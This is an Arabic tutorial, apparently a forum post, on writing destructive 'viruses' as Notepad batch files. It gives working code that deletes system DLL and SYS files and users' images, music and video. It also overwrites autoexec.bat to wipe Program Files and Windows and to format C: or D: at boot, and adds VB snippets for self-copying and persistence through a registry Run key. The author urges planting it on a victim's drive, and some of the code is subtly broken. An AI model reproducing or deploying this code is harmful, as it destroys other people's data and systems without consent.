سوف تعلم تصميم الفيروس بواسطة notepad المفكرة
لتصميم فيروس بهذا النوع يجب ان تعرف كيف تضع الأكواد التى سوف اعطيها لك و هى عن طريق فتح برنامج notepad وكتابة الكود فيه
ثم حفظه باى اسم تريده ولاكن بامتداد .bat ....مثل :Blue.bat
من الأفضل نسخ الكود و لصقه فى المكان الذى تريده
نبدأ بالكود الأول :
--------------------
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
الـتوضـــــــــــتيح :
* بعد ان قمت بوضع الكود و حفظه بامتداد .bat فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ ان شكل الأيقونة قد تغير
الى شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل و اياك ان تفتحه
* هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys من نظام. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به
سوف نجد انه كتب فى هذا الكود امر deltree و هو الخاص بمسح الملفات ثم كتب بعد ذلك *.dll كما كتب *.sys و هو انى قد اعطيت
له بان يمسح كل الملفات التى لها الأمتدادين السابقين و يمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من نظام و سوف نجد فى
اول الكود الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر بالذهاب الى c: و كما اعطاه الأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم
اخبرناه ان الأوامر التالية يجب ان تكون داخل System و الذى هو موجود ضمن ملفات الويندوز
*و الآن ما رايكم هل هناك من يستطيع اجابتى على سؤالى و هو هل يمكننا تعديل هذا الكود ؟!!
----- لن ادعكم تفكرون فى الأجابة فانا سوف اعجبكم بكل بساطة و هى يمكننا ان نغير اى شئ قد فهمناه جيدا لذا نحن يمكننا ان نغير هذا الكود
قليلا وسو اخبركم عما هو يمكننا ان نغيره و طبعا نتم تعرفون المكان الذى يمكننا ان نغيره فى الكود فيمكننا ان نغير نوعية الملفات التى سوف يقوم
بمسحها او يمكننا زيادتها كما يمكننا ان نغير المكان الذى سوف يوجد فيه فمثلا هناك من يضع نوعين من انظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا
يمكننا ان نغير اتجاه الفيروس الى d:
مثال توضيحى :
انا الأن يمكننى ان اصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما اننى
اريد ان امسح جميع ملفات الأغانى التى امتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التى توجد فى E: كل ما علينا هو تعديل
الكود ليصبح كالأتى
@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf
ايه رايكم فى الفيروس الجديد اتمنى يعجبكم
الكود الثانى
--------------
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
الـتوضـــــــــــتيح :
نبدا بتوضيح الكود : فكما نرى فى الكود سطر مجرد فائدته مسح الشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا الفيروس هو الوحيد
بعد سوف نجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن يمكننا ان نوضح انه هناك 3 اكود منفصله هم الفكرة الأسايه
و هما ما سوف نحن نوضحه
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
يعطى هذا المود الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التى تنزل على الجهاز و نلاحظ تكراره فى مسح الويندوز فى الكود
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
ولاكنه اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك اعطى امر نسخ لهذان الأمرن حتى يمكننا استخدامهم فيما بعد
و هذا هو ما اعطاه هذان السطرين
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
اما بعد ذلك فهو اعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
اولا يوجد بعض الامور توضيحها قبل البدأ فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه
يتمتع بذلك بعد ان يفتح جهازه
ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضع فيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عنده
ويندوز موضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخ الأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات
اما بالنسبة لتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامر مسح الويندوز و Program files و تدع امر الفورمات مع تغير
مثلا انه يسوى فورما على الـ D: فيكون لكود كما يلى
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat
--------------
الأن و بعد ان تعرفنا الى الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده
الخاصــــــــــــــية الأولى :-
On Error Resume Next
Dim copy, copy2
copy = "c:\virus.exe"
copy2 = "c:\windows\system\Project12.exe"
FileCopy copy, copy2
يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا اذا كنت من الفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى معه
الخاصــــــــــــــية الثانيه :-
Option Explicit
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueN*** As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueN*** As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueN*** As String) As Long
Private Const REG_SZ = 1
Private Const LOCALMACHINE = &H80000002
Private Sub Command1_Click()
Dim InputValue As String
Dim nBufferKey As Long, nBufferSubKey As Long
RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
InputValue = "c:\windows\system\Project12.exe"
RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey
RegOpenKey nBufferKey, "Run-", nBufferSubKey
RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)
End Sub
يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry :
انتهى الدرس
